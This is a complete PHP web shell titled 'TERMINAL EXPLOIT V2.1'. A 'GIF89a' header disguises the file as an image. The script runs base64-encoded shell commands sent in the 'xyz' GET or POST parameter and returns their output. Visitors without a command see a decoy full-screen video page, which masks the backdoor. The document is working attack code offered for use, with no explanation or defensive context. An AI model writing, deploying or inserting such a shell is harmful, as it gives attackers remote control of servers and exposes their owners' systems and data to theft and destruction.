TERMINAL EXPLOIT V2.1
GIF89a;
<?php
ob_clean();
if (($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['xyz'])) ||
($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['xyz']))) {
$command = ($_SERVER['REQUEST_METHOD'] === 'POST') ? $_POST['xyz'] : $_GET['xyz'];
$descriptorspec = [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
];
$decodedCommand = base64_decode($command, true);
if ($decodedCommand === false) {
echo "64";
exit;
}
$process = proc_open($decodedCommand, $descriptorspec, $pipes);
if (is_resource($process)) {
$stdout = stream_get_contents($pipes[1]);
$stderr = stream_get_contents($pipes[2]);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
$fullOutput = $stdout . "\n" . $stderr;
echo $fullOutput;
} else {
echo "exception. ";
}
} else {
echo "<head><style>body{background: black; padding: 0; margin: 0; overflow: hidden;}</style></style></head></head><video src=\"https://fileuploader.generativeobjects.com/uploads/md.mp4\" autoplay muted loop playsinline style=\"height: 100%; position: absolute; top: 0; left: 0;\"></video>";
}
?>
[ CLOSE ]